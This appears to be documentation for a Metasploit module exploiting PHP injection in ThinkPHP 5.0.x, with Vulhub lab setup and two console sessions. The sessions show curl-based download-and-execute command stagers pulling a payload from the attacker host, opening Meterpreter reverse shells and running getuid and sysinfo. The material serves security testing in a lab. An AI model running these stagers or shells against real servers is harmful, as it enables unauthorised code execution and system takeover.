## Vulnerable Application ### Description This module exploits one of two PHP injection vulnerabilities in the ThinkPHP web framework to execute code as the web user. Versions up to and including 5.0.23 are exploitable, though 5.0.23 is vulnerable to a separate vulnerability. The module will automatically attempt to detect the version of the software. Tested against versions 5.0.20 and 5.0.23 as can be found on Vulhub. ### Setup 1. `git clone https://github.com/vulhub/vulhub` 2. `cd vulhub/thinkphp/5-rce` for 5.0.20 or `cd vulhub/thinkphp/5.0.23-rce` for 5.0.23 3. `docker-compose up -d` ### Targets ``` Id Name -- ---- 0 Unix Command 1 Linux Dropper ``` ## Verification Steps Follow [Setup](#setup) and [Scenarios](#scenarios). ## Options ### SRVPORT If you are testing the [Docker container](#setup), which binds to port 8080 by default, and you are using an HTTP(S) command stager, set this to a different port to bind the command stager server to. ## Scenarios ### ThinkPHP 5.0.20 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce) ``` msf5 > use exploit/unix/webapp/thinkphp_rce msf5 exploit(unix/webapp/thinkphp_rce) > show missing Module options (exploit/unix/webapp/thinkphp_rce): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' Payload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) msf5 exploit(unix/webapp/thinkphp_rce) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 msf5 exploit(unix/webapp/thinkphp_rce) > set lhost 192.168.1.3 lhost => 192.168.1.3 msf5 exploit(unix/webapp/thinkphp_rce) > set cmdstager::flavor curl cmdstager::flavor => curl msf5 exploit(unix/webapp/thinkphp_rce) > set srvport 8888 srvport => 8888 msf5 exploit(unix/webapp/thinkphp_rce) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. ThinkPHP 5.0.20 is a vulnerable version. [*] Targeting ThinkPHP 5.0.20 automatically [*] Using URL: http://0.0.0.0:8888/IV0dIafe [*] Local IP: http://192.168.1.3:8888/IV0dIafe [*] Generated command stager: ["curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm"] [*] Executing command: curl -so /tmp/UJiMvCsm http://192.168.1.3:8888/IV0dIafe;chmod +x /tmp/UJiMvCsm;/tmp/UJiMvCsm;rm -f /tmp/UJiMvCsm [*] Client 192.168.1.3 (curl/7.52.1) requested /IV0dIafe [*] Sending payload to 192.168.1.3 (curl/7.52.1) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3012516 bytes) to 192.168.1.3 [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:64475) at 2020-04-13 01:02:13 -0500 [*] Command Stager progress - 100.00% done (112/112 bytes) [*] Server stopped. meterpreter > getuid Server username: no-user @ c94d71fb70ec (uid=33, gid=33, euid=33, egid=33) meterpreter > sysinfo Computer : 172.21.0.2 OS : Debian 9.4 (Linux 4.19.76-linuxkit) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > ``` ### ThinkPHP 5.0.23 from [Vulhub](https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce) ``` msf5 exploit(unix/webapp/thinkphp_rce) > set rport 8081 rport => 8081 msf5 exploit(unix/webapp/thinkphp_rce) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. ThinkPHP 5.0.23 is a vulnerable version. [*] Targeting ThinkPHP 5.0.23 automatically [*] Using URL: http://0.0.0.0:8888/zD3iTDja [*] Local IP: http://192.168.1.3:8888/zD3iTDja [*] Generated command stager: ["curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf"] [*] Executing command: curl -so /tmp/XnysdYyf http://192.168.1.3:8888/zD3iTDja;chmod +x /tmp/XnysdYyf;/tmp/XnysdYyf;rm -f /tmp/XnysdYyf [*] Client 192.168.1.3 (curl/7.52.1) requested /zD3iTDja [*] Sending payload to 192.168.1.3 (curl/7.52.1) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3012516 bytes) to 192.168.1.3 [*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.3:64482) at 2020-04-13 01:03:29 -0500 [*] Command Stager progress - 100.00% done (112/112 bytes) [*] Server stopped. meterpreter > getuid Server username: no-user @ 9a6301c3c31d (uid=33, gid=33, euid=33, egid=33) meterpreter > sysinfo Computer : 172.22.0.2 OS : Debian 9.6 (Linux 4.19.76-linuxkit) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > ```